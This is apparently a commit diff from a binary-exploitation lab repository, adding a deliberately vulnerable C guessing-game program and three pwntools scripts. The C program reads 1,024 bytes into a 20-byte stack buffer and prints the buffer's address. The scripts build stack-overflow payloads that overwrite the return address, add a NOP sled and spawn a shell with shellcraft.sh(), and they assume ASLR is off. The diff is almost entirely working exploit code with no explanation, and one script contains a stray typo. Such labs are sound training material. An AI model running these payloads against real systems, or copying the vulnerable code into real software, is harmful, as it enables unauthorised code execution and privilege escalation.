Added shellcode injection

Author: meharehsaan

shellcode-injection/code.c

@@ -0,0 +1,49 @@
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+
+char win[] = "YAY!";
+char lose[] = "Nope!";
+
+void print_data( char* data, int len) {
+    for( int x = 0; x <= len; x++ )
+    {
+        printf("%c", data[x]);
+    }
+}
+
+char* check_value(int random) {
+    char buffer[20];
+    char *output = lose;
+    int check;
+    int input_length;
+
+    printf("Location of the buffer %p\n", buffer);
+    printf("\nWhat's your guess? \n> ");
+    input_length = read(STDIN_FILENO, buffer, 1024);
+    printf("Your input: ");
+    print_data( buffer, input_length );
+    check = atoi(buffer);
+    if(check == random) {
+        output = win;
+    }
+    return output;
+}
+
+void main()
+{
+    gid_t egid = getegid();
+    setregid(egid, egid);
+
+    int r = rand() % 10;   
+    char* output;
+    printf("Can you guess the number?\n");
+    while(1) {
+        output = check_value(r);
+        printf("\n--- %s ---\n", output);
+        if( output == win )
+        {
+            break;
+        }
+    }
+}

shellcode-injection/demoexpstage1.py

@@ -0,0 +1,20 @@
+from pwn import *
+
+context.arch = 'amd64'
+context.os = 'linux'
+context.aslr = False
+context.log_level = 'error'
+
+io = process('/home/stage1/stage1-noaslr')
+
+offset = cyclic(80)
+addr = p64(0x7fffffffe3b0)
+junk = b'A' * offset
+payload = junk + addr + (b'\x90' * 400) + asm(shellcraft.sh())
+
+file = open('payaslr', 'wb')
+file.write(payload)
+file.close()
+
+# io.sendline(payload)
+# io.interactive()

shellcode-injection/expstage1-noaslr.py

@@ -0,0 +1,25 @@
+#!/usr/bin/env python3
+from pwn import *
+
+context.log_level = 'debug'
+context.terminal = '/bin/sh'
+context.aslr = False
+context.arch = 'amd64'
+context.os = 'linux'
+
+p = process('/home/stage1/stage1-noaslr')
+p.recvuntil(b"What's your guess?")
+
+substring = pack(0x616161706161616f)
+offset = cyclic(80).find(substring)
+target = p64(0x00007fffffffe3b0)
+
+payload = (b'A' * offset) + target + (b'\x90' * 400) + asm(shellcraft.sh())
+
+file = open('payaslr', 'wb')
+file.write(payload)
+file.close()
+
+p.sendline(payload)z
+
+p.interactive()

shellcode-injection/expvuln.py

@@ -0,0 +1,24 @@
+from pwn import *
+
+# context.log_level = 'debug'
+context.terminal = '/bin/sh'
+context.aslr = False
+context.arch = 'amd64'
+context.os = 'linux'
+
+p = process('./vuln')
+
+junk = b'A' * 56
+nop_sled = b"\x90"
+addr = p64(0x7fffffffde10)
+shellcode = asm(shellcraft.sh())
+# libc.address = 0x7ffff7d8c000
+
+payload = junk + addr + (nop_sled * 300) + shellcode
+
+file = open('payload', 'wb')
+file.write(payload)
+file.close()
+
+p.sendline(payload)
+p.interactive()